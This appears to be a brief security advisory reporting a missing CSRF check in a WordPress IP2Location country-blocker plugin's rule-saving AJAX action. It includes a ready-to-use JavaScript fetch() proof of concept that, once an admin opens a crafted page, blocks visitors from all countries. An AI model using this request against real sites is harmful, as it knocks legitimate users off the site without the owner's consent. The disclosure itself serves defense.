The plugin does not have CSRF check in the ip2location_country_blocker_save_rules AJAX action, allowing attackers to make a logged in admin block arbitrary country, or block all of them at once, preventing users from accessing the frontend.
Make an admin open a page with the following code in it, which will ban visitors from all countries:
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": new URLSearchParams({"action":"ip2location_country_blocker_save_rules", "countries[]": "nonexistent", "mode": 0}),
"method": "POST",
"credentials": "include"
})
.then(response => response.text())
.then(function(data) { console.log(data); });